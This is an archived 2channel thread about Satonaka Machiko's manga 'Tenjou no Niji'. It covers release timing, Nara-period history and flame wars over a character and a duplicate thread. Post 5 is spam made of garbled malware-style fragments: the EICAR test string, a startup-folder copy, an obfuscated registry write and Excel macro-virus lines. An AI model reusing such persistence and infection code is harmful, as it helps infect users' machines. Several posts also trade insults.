2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

天上の虹と里中満智子 その14

1 :花と名無しさん:2007/08/11(土) 12:20:15 ID:3WSQKZfN0
持統天皇の生涯を描いた大作、「天上の虹」の完結を見届けようというスレです。
その他の里中作品の話題も可。

先生の公式サイト
http://www.satonaka-machiko.com/

前スレ
Part13 http://anime2.2ch.net/test/read.cgi/gcomic/1180102650/
 

過去ログは>>2の辺りにあります。
注意事項は>>3にあります。



2 :花と名無しさん:2007/08/11(土) 12:22:41 ID:???0
2 名前: 花と名無しさん [sage] 投稿日: 2007/05/25(金) 23:17:55 ID:???0
過去ログ
Part1  http://salad.2ch.net/gcomic/kako/976/976202860.html
Part2  http://comic.2ch.net/gcomic/kako/998/998068686.html
Part3  http://comic.2ch.net/gcomic/kako/1011/10118/1011887031.html
part4  http://comic.2ch.net/gcomic/kako/1032/10320/1032062256.html
part5  http://comic.2ch.net/gcomic/kako/1038/10381/1038119380.html
part6  http://comic.2ch.net/test/read.cgi/gcomic/1044950554/
part7  http://comic.2ch.net/test/read.cgi/gcomic/1061047291/
part8  http://comic6.2ch.net/test/read.cgi/gcomic/1068469495/
part9  http://comic6.2ch.net/test/read.cgi/gcomic/1095821174/
part10 http://comic6.2ch.net/test/read.cgi/gcomic/1126008809/
part11 http://anime2.2ch.net/test/read.cgi/gcomic/1157460639/
part13 http://anime2.2ch.net/test/read.cgi/gcomic/1180102650/

過去ログミラーサイトはこちら
http://artemis.s77.xrea.com/gclog/satonaka/


3 :花と名無しさん:2007/08/11(土) 12:29:27 ID:???0
注意事項
ここにおいて、こういったレスをする厨は典型的な迷惑厨なので相手にならずスルーしましょう。

例1)・讃良の悪人度合は、私の中ではまだ十市よりましだね。
この天皇は純潔を守ってたし。十市みたいな浮気した挙句、淫乱色基地に成り下がり、
挙句の果てに身勝手な自決した馬鹿女じゃないだけ評価できるよ。

例2)(例1に対する批判に対して)・2chはね何言おうが自由なわけ。考え方は人それぞれ違って当然。
何万通りも考え方があるんだからいかなる意見にケチ入れるなんてあってはならない事。
そんなの2chではない。
だから2chで罵るのがイカンなんて考えられん。文句があるならお前は2ch向いてない。さっさと出て行くべし。

・他にババア・婆と煽るキチガイなど

4 :花と名無しさん:2007/08/11(土) 12:38:52 ID:???0
■スルー推奨厨の追加
・登場人物への(常識的範囲内の)批判に対し、過剰に反応して変な煽りレスを繰り返し付ける変態

5 :花と名無しさん:2007/08/11(土) 20:41:29 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :花と名無しさん:2007/08/11(土) 21:08:03 ID:pAjfKh1B0
>>1
どうせ夏の暑さで脳が溶けてる奴とか
荒らす奴は注意とかはなからシカトだと思うけど
とりあえず乙です


>2の過去ログその12がないべ?


7 :花と名無しさん:2007/08/12(日) 00:00:59 ID:???0
大奥のDVDレンタルしてみたけど
最後に天章院が十市みたいに恋人の胸に飛び込んでいたら萎えまくりだった。
あそこで元御台所としての誇りと自覚を選んだから良かったんだよね
十市も近江朝廷の女主人らしく威厳を持ってきっぱり高市を拒絶していたら
すごくかっこいい女になれてただろうに


8 :花と名無しさん:2007/08/12(日) 00:06:49 ID:???0
浅野の大奥総取締も貫禄があってよかったな
さららもあくまでも国家のために息子を無理やり跡継ぎにしたなんて言い訳せずに
息子可愛さの自己愛で大津滅ぼしたといえばよかった。
自己愛だけど、息子のためなら悪人になってもかまわないって信念だって通したほうが
魅力的なキャラになったと思う。国のためなんて言い訳がましいこといわれるとなえる

9 :花と名無しさん:2007/08/12(日) 00:29:21 ID:???0
>>6
前のスレにもその12のリンクはなかったで。

10 :花と名無しさん:2007/08/12(日) 00:36:13 ID:???0
>>9
前スレは1に12のリンクが貼ってあるんだよ
(前スレの前スレだから)

11 :花と名無しさん:2007/08/12(日) 01:02:23 ID:???O
>>1
スレ立て乙。

早速妙なのも来てるみたいだけど…(・∀・)キニシナイ

12 :花と名無しさん:2007/08/12(日) 01:36:05 ID:???0
>>3
これが前スレで散々迷惑だった「十市厨」か。

13 :花と名無しさん:2007/08/12(日) 01:48:57 ID:???0
>>3
よっぽど悔しかったんだな。
まともな反論もできないから、こんなところにそんな厨書き込みをw

14 :花と名無しさん:2007/08/12(日) 02:00:03 ID:???0
>>5
こいつってこのスレにだけ現れる粘着コピペ荒しだと思ってたけど、
少女漫画板の他の板も確認したらどの板にも無差別に貼ってるんだなw

15 :花と名無しさん:2007/08/12(日) 02:08:58 ID:???0
>>14
おまいさんは、このスレ以外にはあまり行かないのか?
2005年冬頃から、少女漫画板の古参スレのほぼ全部に
継続スレが立てられると、いつも貼られているよ。

16 :花と名無しさん:2007/08/12(日) 02:10:02 ID:???0
>>13
見るからに該当者が必死で吹いたw
今頃新スレ慌てふためいて立てたりしてw

必死の工作までして
そんなに>>3があると荒しにくくなると焦ったと見た



17 :花と名無しさん:2007/08/12(日) 02:13:03 ID:???0
だから華麗にヌルーですよ。


18 :花と名無しさん:2007/08/12(日) 02:25:11 ID:???0
>>16
全く何がしたいんだかwやっぱり確信的荒しだったか。
どうせ別に新スレ立てるならはっきり【十市アンチ専用】【信者立ち入り禁止】にでもして好きなだけギタギタに叩きまくればいいのにね。
本当に十市が死ぬほど嫌いな人の数が多いんだったら分離スレとして成り立つでしょw


19 :花と名無しさん:2007/08/12(日) 02:34:28 ID:???0
>>18
どうしてもそういったスレとして活用したいなら、少女漫画板じゃなく
懐板でもマロンにでも池って感じなんだがw

20 :花と名無しさん:2007/08/12(日) 03:17:40 ID:???0
あんなリア基地久々に見た。某国の人みたいだw

21 :花と名無しさん:2007/08/12(日) 03:26:17 ID:???0
異常な理屈のパターンも>>3の迷惑厨そのものでワロタ>重複珍走スレ

22 :花と名無しさん:2007/08/12(日) 08:16:17 ID:???O
突然ですが教えてチャソでゴメン。
完結したら読んでみようと思っていたんですが、
天上の虹は終わりそうな気配ってあるの?
10年ぐらい前にチラっと病院の待合室で見かけて以来、
今年の始め頃にコミクスが発売されたと聞いて驚いたものの
こうしてスレ存続と言う事は、まだ未完なんだろうとは思う。
よければ、スレ住人のいつ頃なら完結するかも…と言う予想を聞かせて。

23 :花と名無しさん:2007/08/12(日) 08:31:19 ID:???0
十市信者って馬鹿?
こんなあからさまな注意書きしたら
前スレあらした十市厨ですよって
声を大にして叫んでるも同然じゃん
でも久々に笑わせてくれてありがとよ

24 :花と名無しさん:2007/08/12(日) 09:29:20 ID:???O
>>22
完結には着実に近づいているけど、書き下ろし単行本だから発行は不定期。里中さんの体調とスケジュールによります。
完結までは後2巻ほどあるんじゃないかと思う。発行は早くて2〜5年かかるのでは無いだろうか。

25 :花と名無しさん:2007/08/12(日) 11:24:43 ID:???0
>>3
があるとよっぽど困るらしいw
>>3に妙な反応見せる奴がこの迷惑厨ってやつじゃなければ普通は反応しませんね。
>>4には反応0だしねー何でかなw
あそこのスレの1=>>3の迷惑厨確定ね


26 :花と名無しさん:2007/08/12(日) 11:42:10 ID:tk/bBA8L0

>>3の迷惑厨の正体


13 名前: 花と名無しさん [sage] 投稿日: 2007/08/12(日) 01:48:57 ID:???0
>>3
よっぽど悔しかったんだな。
まともな反論もできないから、こんなところにそんな厨書き込みをw


・こんな妨害重複スレを涙目で慌てふためいて立てて必死の自演で応戦する荒し。以後そこを必死で一人の自演でageで維持していくと思われます。
http://megalodon.jp/?url=http://anime2.2ch.net/test/read.cgi/gcomic/1186851564/&date=20070812112622

>作品批判、キャラ批評はOKですが、過度の叩きはやめましょう。
荒らしはスルーで、まったりと。
などとスレの最初でもっともらしく書いて一応は良心派を装いながら、暫くしてまた別人のフリしてまた十市の粘着罵倒レス持ち込んで荒すのがミエミエw


★こいつに見られる基本性質・習性
・相手にしてくれる人が釣れるまで煽る。それでも釣れない場合は必死の自演問答・一人芝居を繰り返す。(同調レスが1,2分置きの感覚で付く単純明確さ(笑))
(それでもなお誰も相手にしないとなると勝手に立てた↑の妨害重複スレからわざわざこっちに乗り込んで中傷する始末。超粘着質)
・レスに餓えているかわいそうなかまって荒しなので、レスを得る為ならどんな自演も中傷煽りも辞しません。
餌を与えないように。





27 :花と名無しさん:2007/08/12(日) 12:06:06 ID:???0
>>7-8見て、かやまゆみの「時をかけた少女たち」の和宮の物語を思い出した。
和宮も夫である将軍の死後、江戸城が落城し、官軍の総司令官として入城した元婚約者が
「これからは私があなたが守ります」
というのに対し、
「私は徳川の人間です」
と言って命をかけて婚家を守る。
そういう、最高責任者の妻としての覚悟や意志が見られないところが読者の一部からはもどかしくて好感持たれないのかも。
まあ、和宮の場合は十市と違って政略結婚後、本当に夫を愛して夫婦としての絆を築いていたから
一概に同一視はできないだろうけど。



28 :花と名無しさん:2007/08/12(日) 12:16:11 ID:???0
>>23
はいはいわろすわろす
巣でやれ
>>18
>>19


29 :花と名無しさん:2007/08/12(日) 12:37:18 ID:???0
>>24
早くて2〜5年・・・w
二年はともかく五年は流石に読者も忘れそうだね。
それかもう愛想を尽かされるか。「TVには出てるのに?」とw

30 :花と名無しさん:2007/08/12(日) 16:06:50 ID:???0
>>27
確かに一概に同一視はできないけど
十市の場合は大友が自分を愛しているって最初からわかってるんだから
政略要素だけの婚姻だった和宮よりずっと仲のいい夫婦になれる要素はあったし
一度は「自分は皇后だから」と近江朝廷と運命共にするようなこといって
大友の死後、その舌の根も乾かないうちに高市と再会したとたん熱い抱擁
(大友正妃である自分は再婚はできないってわかっているはずなのに)
「この子の頼もしい義父に」ってすでに高市との再婚を視野にいれて
滅ぼされた側の最高責任者としての自覚とかが全く無いというか
コロコロ変わってる面が優柔不断でうじうじしてるようにみえて読者は嫌になるんだと思う


31 :花と名無しさん:2007/08/12(日) 16:11:34 ID:???0
和宮は夫は死んで後を継ぐ子供もいなくて
残っているのは仲が悪かった姑たちしか残ってない徳川家を守ったんだから
十市はその点、息子が残ってるんだから、近江朝廷の跡継ぎとして
息子をしっかり育てようとか、もしくは反近江側の人間から息子を守ろうとか
そういう気概が全くなかったのがね。母は強しって言葉は十市には全く当てはまらない

32 :花と名無しさん:2007/08/12(日) 16:34:20 ID:???0
>>15
うん
少女漫画板ではこのスレしか見ないな。


33 :花と名無しさん:2007/08/12(日) 16:39:45 ID:???0
というかスレ2コできててビックリしたw
分裂してるみたいだけどこれって2ちゃん的におkなの?ルール関係ないって言ってんね。
tk完全にスレ鯛も同じなんやけどw

34 :花と名無しさん:2007/08/12(日) 16:47:51 ID:???0
>>30
釣られるが貴方明らかに反十市が立てたあっちの荒しスレのが合うんじゃないの?
「これは批評です」って居直って
また自演で応戦して荒すのねw手口がバレバレです

35 :花と名無しさん:2007/08/12(日) 17:23:32 ID:???0
>>33
ローカルルールでは禁止ってなってるね
でもそれは建前で
実際はおkなんじゃない?荒れてる板ではよく見るよ
本家争い

36 :花と名無しさん:2007/08/12(日) 18:42:59 ID:???0
30、31はわざわざ荒れそうな話題選ぶ確信犯か
重度の空気読めない病のどっち?
構うと面白がるからなこの手の人はw

37 :花と名無しさん:2007/08/12(日) 19:08:31 ID:???0
>>34=>>36

38 :花と名無しさん:2007/08/12(日) 19:13:47 ID:???0
>>37
それで?

39 :22:2007/08/12(日) 21:35:38 ID:???0
>>24
出先から帰ってきた。レスdクスです。
そうですか…あと2巻ぐらいでも、5年ぐらいかかる可能性か…。
体調は確かに心配ですが、完結する気持ちがあるのなら気長に待ちます。
(クリドラと柄亀も待ってるもので…w)

>>35
削除人さんはボランティア。それに夏厨がはびこる時期で忙しいから
基本過疎の少女漫画板は、何度も削除依頼の召喚しないと
たぶん重複スレは削除されない。
現に現在御請スレは3つ並行してるw 事実上おkってことではなく
単に手が足りなくて、なかなか作業されず→1ヶ月経過がよくあるだけです。


40 :花と名無しさん:2007/08/12(日) 22:06:52 ID:???0
漫画板のWEEDスレなんてそれほど荒れもせずになぜか重複スレが平和に共存してるね。
そんな風にまったりいくなら個人的にはどうでもいいけど。

41 :花と名無しさん:2007/08/12(日) 23:28:58 ID:???0
>>39
そうなのかトンです。
一通り両方の流れを見てみましたが・・・w
この機会に上手く住み分けできればいいですね。
(板のルール的には駄目な事なんだろうけど)

42 :花と名無しさん:2007/08/13(月) 09:54:01 ID:???0
住み分けというかあっちには前散々いた>>3みたいな人とか批判的な人はいないから
あっちが反十市スレみたいにはなってないみたいけどね
こっちは十市を叩く気はない趣旨のスレだけど


43 :花と名無しさん:2007/08/13(月) 09:55:18 ID:???0
>>42
十市に批判的な人 です


44 :42−43:2007/08/13(月) 10:10:22 ID:???0
いやゴメンこれじゃ別の意味にとられてしまうな>>42
>>43>>42の修正です

45 :花と名無しさん:2007/08/13(月) 12:10:45 ID:???0
都合が悪くなると答えないで妄想連投荒しかw手前を差し置いて盗人猛々しい輩だなw

誰が荒したのかはここの1で確定でしょw

・先に立ったスレの注意書きの内容に異常に反応して重複スレ立てる 注意書きがかな〜り気に食わない模様w

・向こうではわざわざスルー推奨にしてる十市叩きをわざわざ「批評」と称して書き込む荒しがあるが
こっちでは十市批判はもちろん関連話すら全くと言ってO
変ですねw

答えはここの1が十市叩きで荒してた張本人だからwここは静かで平和だなw

「公開掲示板だから何言ってもおkなのでは?」って居直る言い草もあの嵐してたよねw
私が荒し?違うってw単なる一考えを書いたまでですよ?

それに公開掲示板だから何言ってもおkなのでは?ただの意見を嵐と感じるなんて公開掲示板には向いてないよw
それにこれを荒しと感じる感じないは人それぞれ、
荒しだの電波だのと感じる人が他人の一意見を封じる権利なんてありませんからw通報します?IP出されちゃうww

都合が悪くなると「キチガイ荒しはスルーしよう。天虹の話題しましょ。さららは美人」
「そうそうさらら美人だよね(即効同調w)」
このダブル自演の流れはワンパターンですな
せめて時間間隔空けろw

46 :45:2007/08/13(月) 12:14:24 ID:umeO6J5A0
↑誤爆失敬www
嵐が紛らわしい重複スレ立てやがるからこうなるww


47 :花と名無しさん:2007/08/13(月) 20:16:56 ID:???0
んーそのなんだ。少女マンガ板とかID出ない板で、人数少ないスレとか過疎ってるスレには一人何役はよくある話で。
しばらくオッチしてるとコテもIDもなくてもこのレスはあの人かな?とかって言ってる事や言い回しの癖で分るけどw
スレの活性にもなるので平和なスレでなら必要悪とも言えなくもないけど、揉めると最悪な事になるね。

48 :花と名無しさん:2007/08/13(月) 21:17:24 ID:JZ7iKzLt0
私は某皇女よりじとう天皇の方が嫌いですよ。そりゃま現代の感覚で見てるからかも知れませんがW
この人の政治感覚は男性・いやそれ以上ですなー、皇室の人間離れして武家的ともいえます
皇室の人間でここまで思い切った行動取った人はそうそう男でもいないんじゃとW

49 :花と名無しさん :2007/08/13(月) 21:34:27 ID:7UEcbI9H0
天上の虹第一部(全6巻)を図書館で読んだのですが
第二部って発行されているのですか?

50 :花と名無しさん:2007/08/13(月) 22:18:27 ID:???0

某皇女は私も嫌いじゃない。むしろ気の毒だと思ってるよ。
言論の自由だ、とか信者は独善的だ、とか変な屁理屈垂れて、
綿々と批判論→叩き→荒れるのはもう簡便w
彼女嫌いな人同士で語り合うより、好きな人相手に議論ふっかけたほうが、
いちいち反応があって面白いからだと思うけど。(ある種の人には)




51 :花と名無しさん:2007/08/13(月) 22:28:45 ID:???0
>>49
各種web書店で検索すればすぐわかる事ですが、
例えばAmazonでは、↓の通り。
2007年に最新20巻まで発行されています。
ttp://www.amazon.co.jp/gp/product/4063406318/ ≪商品説明≫
ttp://www.amazon.co.jp/gp/product/images/4063406318/ ≪表紙画像拡大、帯付≫

52 :花と名無しさん:2007/08/13(月) 23:01:09 ID:???0
>>50
文庫版、古本屋に置いてあった巻の立ち読みしかしてませんけど・・・
文庫版って確か単行本で言う13巻まででしたね。
13巻からは書き下ろしになっちゃいましたけど、
第二部は単行本が完結してちょっと経ってから出るんじゃないかしら。
って事はあと何年後になる話かわかりませんねえw
バラ売りじゃなくて6巻セットで一部って売り方なんですね。



53 :花と名無しさん:2007/08/13(月) 23:08:55 ID:3Pl/1wG7O
これ見てガッカリした人のために忠告。

ここは本スレではありませんよ。

54 :花と名無しさん:2007/08/13(月) 23:35:53 ID:???0
>>53
で?露骨過ぎてワロタ
向こうの重複スレ(自称「本スレ」)の1が客引きしておりますw

もうそんな電波スレもうどうでもいいから勝手にやってくださいよ
でもこっちは反十市スレじゃないからアナタの好きな十市議論荒しはお断りなんですw
それはそっちで楽しくやれな


55 :花と名無しさん:2007/08/13(月) 23:56:39 ID:???0
公開掲示板に合わない考えの人のスレなんだから不満があるなら来なくていいんだけどねー
何もそういう人にこっちに来いとは強制はしてないよw
むしろ来なくていいからwさっさと巣に帰ってね
あんまり構うと例の如く自演擁護の一人芝居始めるなw

56 :49:2007/08/14(火) 20:48:32 ID:DngdwDPU0
>>51
>>52

ありがとうございました。
とりあず文庫版全6巻を買って、家でゆっくり読みたいと思います。



57 :花と名無しさん:2007/08/14(火) 22:11:23 ID:???0
>>48
古代の女帝は持統を筆頭にみんななかなかやり手でパワフルなんだよね。
持統に匹敵する女帝は推古、孝謙って処かな?
孝謙もまた持統同様に悪名高い女帝だねw


58 :花と名無しさん:2007/08/14(火) 23:56:22 ID:QIslcsuW0
持統の頭の中は大海人、草壁、国って感じだ
孝謙の頭の中は愛、藤原で国の事はあまり頭にない印象。


59 :花と名無しさん:2007/08/15(水) 20:42:26 ID:???0
そうかな、孝謙の頭は 国、愛(落ち着き・やすらぎ)、打倒藤原
だと思う。

60 :花と名無しさん:2007/08/15(水) 23:28:19 ID:???0
ここ隔離スレだよ。

61 :花と名無しさん:2007/08/15(水) 23:57:06 ID:L5lslgoa0
スレを荒すDQN除けを貼ってるスレですよ

62 :花と名無しさん:2007/08/19(日) 19:44:16 ID:???0
単行本の6巻(吉野で大海人と川で戯れるシーンがあったような)を失くしてしまい、
もう単行本は見つからないので、文庫版を購入しようかと思いますが、
文庫版の何巻になるかご存知のかたいますか?

63 :花と名無しさん:2007/08/20(月) 18:30:45 ID:???0
>>58 讃良は幼い時に外戚を亡くし、皇后になれたのは血筋のおかげだけど自分の人生は自分で切り開いていった人だからね。
阿部の場合は所詮苦労知らずだからね。

推古の血筋は続かなかったんだね。その次の斉明のあとの女帝はみな斉明の子孫だよね。

64 :花と名無しさん:2007/08/20(月) 20:38:52 ID:???0
>>62
根気よくブクオフへ行けばけっこうあります。

65 :花と名無しさん:2007/08/21(火) 20:40:11 ID:???0
>>62
文庫3巻

66 :花と名無しさん:2007/08/21(火) 21:07:32 ID:???0
十市、子供の頃はかわいくてきっぱりした性格でいい女に育ちそうだったのに。
いつの間にあんな、他力本願で無責任なDQN女になってしまったんだろ。
自分の立場も子供のことも弁えず、「高市〜、高市〜、抱いて〜」って感じでさ。
はかなそうに描かれてるけど、ぜんぜん同情できない。

67 :花と名無しさん:2007/08/22(水) 15:56:47 ID:???O
讃良がもし、もっと長生きしてたら
首の即位に賛成してたんだろうか…。
自分の直系ではあるけど母方が皇族では無いから
認めなかったかな?

68 :花と名無しさん:2007/08/23(木) 00:41:05 ID:???0
首より吉備の子供たちのほうを押しそう。

69 :花と名無しさん:2007/08/23(木) 21:20:21 ID:???0
645年生まれの讃良が首即位まで生きてたら
当時としたら相当長生きだろな

70 :花と名無しさん:2007/08/24(金) 10:05:21 ID:sSFbyguu0
>>68 血統が良すぎたからこそ吉備の男子達は殺されてしまったんだね…


71 :花と名無しさん:2007/08/24(金) 10:25:07 ID:???0
軽がもうちょっと長生きすれば、吉備の娘を軽の妃にしたりできたのにのう。

72 :花と名無しさん:2007/08/24(金) 18:21:09 ID:???0
>>70 しかも石川氏の母を持つ桑田王も巻き添えを食ったんだよね。石川氏出身ということが災いしたのかな。里中先生は成人していた息子だからという設定にしてあるけど。
本当は吉備の子だけでよかったけれど、それだとあからさまだし、長蛾子の子は助けたいからということだろうか。なんか必要ないのに殺されたみたいな気がして。幼い子どももいたのに。
吉備の子だという説もあるけど本当はどっちの子だったんだろう。

73 :花と名無しさん:2007/08/26(日) 22:02:42 ID:???0
長娥子の子も、兄弟を売って「藤原」の氏を手に入れた
山背王以外、のちのち藤原氏の陰謀で全滅しているわけで。
個人的には、もうあの時代には
長屋王の息子(父系による皇位継承権もち)という条件だけで、
誰が母だろうとあぼん決定なんだろうと思ってる。

74 :花と名無しさん:2007/08/27(月) 00:24:30 ID:???0
>>73
>山背王以外、のちのち藤原氏の陰謀で全滅しているわけで。
黄文や安宿が奈良麻呂の変に加担していた罪で
死亡したことを指しているのなら、単なる陰謀とはいい
切れないんじゃない。長屋王みたいに全くの事実無根で
処罰されたのではなく、実際に奈良麻呂を中心として
謀反を計画していたんだからね。


75 :花と名無しさん:2007/08/27(月) 13:56:33 ID:???0
ところで、十市厨はいなくなったの?
もう普通に十市と大友の話をしても大丈夫?


76 :花と名無しさん:2007/08/27(月) 20:43:49 ID:???0
十市厨ってどういうの指してるのか知らないけど
荒れる話題はあっちのスレでどうぞ

77 :花と名無しさん:2007/08/27(月) 20:50:32 ID:???0
>>66のようなしつこい荒しの事か>十市厨とやらは
こういうのは荒れるんでここはスルー推奨なの
納得できない人はあっちでやろうな

78 :花と名無しさん:2007/08/27(月) 22:12:56 ID:???0
「十市厨」みたいな変な用語使って定着させようとしてた人って66みたいな人でしょう。
相手にされなくても定期的にわざわざ火を付けに来てwこっちにも張り付いてるんでしょうね。

79 :73:2007/08/28(火) 02:04:35 ID:???0
>>74
74さんは奈良麻呂本当に謀反を計画してた説なんだろうけど、
私は、長屋王同様、奈良麻呂の謀反も捏造説なの。
実際、あの時点で謀反を本気で計画していたなら、
道祖王の邸を包囲された時点で、他の首謀者たちが
「大変だ!ばれた!」と、兵を率いて暴れだしたり、
都から逃走しようとしても不思議はないのに、
みんなおとなしく捕縛されすぎ。
逆に捕縛者側、大人数を手際よく捌きすぎ。

その後の仲麻呂の乱のときには、
ちゃんと仲麻呂自身都から脱出してるし、
その時の兵の動きや武力衝突が記録されてること
からみても、納得いかなくて。

80 :花と名無しさん:2007/08/28(火) 08:45:35 ID:???0
今さらだけどさ。身分低い母が皇子である我が子を呼び捨てにするのは、まだ納得できるけど
額田が我が子でもない高市を呼び捨てにするのはこれはいくらなんでもダメでしょ。
不比等も姪の但馬を心の中で呼び捨てにしてるし(公や本人の前ではちゃんと様付けで呼んでるとはいえ)

81 :花と名無しさん:2007/08/28(火) 09:47:29 ID:???0
額田、なんか勝手に娘婿みたいに扱ってるよね高市をw
ってか仮に娘婿でもおかしいけど。大友には様付けだったっけ。
不比等は一応本人の前では敬語だけど、恐れ多くも皇女様の部屋に入っていいんだろうか。
紀の家に人麻呂が乱入してきた時も、一応「皇女様の部屋に入る事はできません。」とか言ってたけど。
それ以前にいきなり皇女様の家に訪ねるのもすごいなおい。

82 :花と名無しさん:2007/08/28(火) 14:27:38 ID:???0
>>80 そういえば、孫の首のことも心の中では呼び捨てにしてたときもあったし。「他の皇子があとを継ぐと首のめがなくなる。」とか
房前も安積親王のことを心の中で呼び捨てにしてたし。「これで安積より安宿のほうが上になる」とかね。
さがせばけっこうあるね。(探さなくても読んでてあれっと思う)

額田の場合は自分よりあとから入った同じ宮人身分の女性が産んだ子だからかも。

実際、例えば大貴族出身の妻(つまり臣下の身分。皇后にはなれないから)が自分より身分の低い妻が産んだ子(つまり皇子皇女)を様付けで呼ぶのは抵抗があるかも。

83 :花と名無しさん:2007/08/28(火) 14:53:03 ID:???0
高市母の尼子といえば大田が難産っぽくて時間かかって
大海人がやきもきしながら尼子のときはryとか言ったとき
尼子が「高貴なお方はゆっくりと生まれておいでなのです」
見たいなこといってたよね。
ほんとにこの人いいひとだーってなんか思ったよ。

84 :花と名無しさん:2007/08/28(火) 15:14:25 ID:???0
>>82
実際、例えば大貴族出身の妻(つまり臣下の身分。皇后にはなれないから)が自分より身分の低い妻が産んだ子(つまり皇子皇女)を様付けで呼ぶのは抵抗があるかも。 >>

いや、それはおかしいと思う。相手は皇子で、貴族出身の妻は皇后になれない(つまり永遠に皇族の身分になれないので)以上、その身分はあくまでも貴族の域をでていないのだから
当然、地方豪族が生んだ子供たちのほうが、はるかに身分上なので、例えば蘇我氏出身の妻だろうと、地方豪族が生んだ皇子には敬語様付け、席も下座が当然だから。
さららたち自身は天皇の妻になったから身分が高くなったのではなく、もともとの身分が皇女だから、自分の母より身分が低い女が産んだ皇子に対して優位なのは結婚前から決まっていた事だし


85 :花と名無しさん:2007/08/28(火) 16:28:30 ID:???0
>>66のどこが荒しなのかわからない。
大友妃であったときから、夫を心理的に裏切って負担をかけて
さらに夫が亡くなってすぐに、敵の大将であった高市とまぐわって、
さらに子供のことより高市が大事。
とんでもないDQN女だと思うけどな。
っていうか、ここって「十市をけなしちゃいけません」っていうファッショスレ?

86 :花と名無しさん:2007/08/28(火) 19:17:51 ID:???O
元々本格的な歴史漫画として始めたわけじゃ無いから、
一般の特に歴史好きと言う程では無い読者にも
わかりやすくする為にしてるんだと思ってたけど>敬語云々‥

例えば額田が高市を呼び捨てなのも、2人が十市を通して親しい関係である事を想像するし、
反対に大友とは形式上は互いに礼儀は尽くしても
どこかよそよそしく感じる。

87 :花と名無しさん:2007/08/28(火) 19:20:31 ID:???0
奈良麻呂って房前顔だったっけ。あの顔って時点で悪役ケテイだもんなw
実際は長屋顔で、長屋と同じように罠にかけられたと妄想してみる。

88 :花と名無しさん:2007/08/28(火) 22:01:29 ID:???0
>>79
でも、謀反が捏造だとすると、その計画内容があまりにも
具体的過ぎると思うんだよね。長屋王や孝謙天皇の異母姉・井上のときなんかは
ただ「天皇を呪った」とかそのくらいのレベルだったのに、奈良麻呂の場合は
誰がどのくらいの兵を率いて、皇后宮を囲み、鈴印を奪うだとか、鎮守府将軍
に任命された大伴古麻呂が赴任すると見せかけて途中で引き返し、
不破関を固める(東国からの援軍を呼べなくするため)だとか、謀反の
内容が明確になっている。
それに、捏造だとするとわざわざクーデター発覚の直前に孝謙天皇が
詔をだして、大伴・佐伯の両氏に軽率な行動を控えるように警告した理由
がわからなくなる。捏造だとしたら、相手に警戒されるだけだから、警告なんて
出さないと思うんだけど。
クーデターが発覚したときに、何故、蜂起したり、都からの脱走を
図らなかったか、という疑問については仲麻呂と奈良麻呂の
軍事力の差が原因なんじゃないかな。
仲麻呂はこのころにはもう紫微内相として国家の軍事機構を完全に
把握していたのに対して、奈良麻呂がクーデターを起こすに当たって
動員する予定だった軍事力っていうのは、大伴、佐伯、多治比、秦の
諸氏の私的軍事力だけだった。だから、仲麻呂を不意打ちして、クーデター
を成功させようと思ってたんだけど、事前に察知されてしまったから、手も足も
出なくなっちゃったんじゃないかと。

以上、長文で失礼しました。

89 :花と名無しさん:2007/08/30(木) 17:33:35 ID:???O
19巻いまさら読んだ

紀ぃの最期、ホラーだ。びっくりした。

90 :花と名無しさん:2007/08/30(木) 20:27:59 ID:???0
井上って、斎宮だったのに、任を解かれた後は
結婚して、子供生んで、しかもだんなが天皇になってすごい人生だね。

91 :花と名無しさん:2007/08/30(木) 21:02:07 ID:???0
>>90
でも、晩年が悲惨だから…

92 :花と名無しさん:2007/08/30(木) 22:26:17 ID:???O
長い斎宮時代は適度に簡略して、漫画や小説にしたら
以外と一番読み応えがある人物かもね>井上


93 :花と名無しさん:2007/08/31(金) 01:49:46 ID:???0
井上の娘の酒人、孫娘の朝原も似たような人生を
送ってるんだよね〜。
いずれも斎宮になり、その任が終わったあとに都に
戻って将来天皇になる人物と結婚しているという・・・(酒人は桓武と朝原は平城と)。
酒人はすごい美人だったらしいが、性格がかなりわがままだったらしい。
でも、彼女の母と弟の死に関して負い目がある桓武はそれを
咎めることはしなかったんだとか。


94 :花と名無しさん:2007/08/31(金) 03:31:38 ID:???0
>>93
出自(母親の身分)とか年齢差とかあったからねえ>桓武天皇と酒人内親王


そういや以前彼女の小説をちらっと読んだことあったな。
弟は井上内親王の実子ではない設定だった。
(実子だとしたら当時としては超高齢出産だからそういう説もある)

95 :花と名無しさん:2007/08/31(金) 11:46:24 ID:???0
養子だという説もあるね。(他の妻の産んだ子とかを)でもだとしたら最初から立太子することもなかったのではとも思うが?



96 :花と名無しさん:2007/08/31(金) 19:12:00 ID:???0
>>89

結構血とかリアルに描く人だからね先生は。。。



97 :花と名無しさん:2007/09/01(土) 00:34:55 ID:???0
実際は紀ィって藤原氏の陰謀で死んだのだったりして…

98 :花と名無しさん:2007/09/01(土) 22:56:03 ID:???0
たった一人で必死だな(pgr

99 :花と名無しさん:2007/09/01(土) 23:55:07 ID:???0
>>85
心理的どころか、実際に裏切ってるよ。
誰が見ててもおかしくない場所で
(皇族が集まってみんなで狩りしてたから公の場も同然)
抱き合って接吻までしてる。
白昼堂々と不倫なんて恐ろしい
でもその後の十市の妊娠できれた高市のゲイ濡れ場のインパクトが強くて
あっちのほうは忘れがち

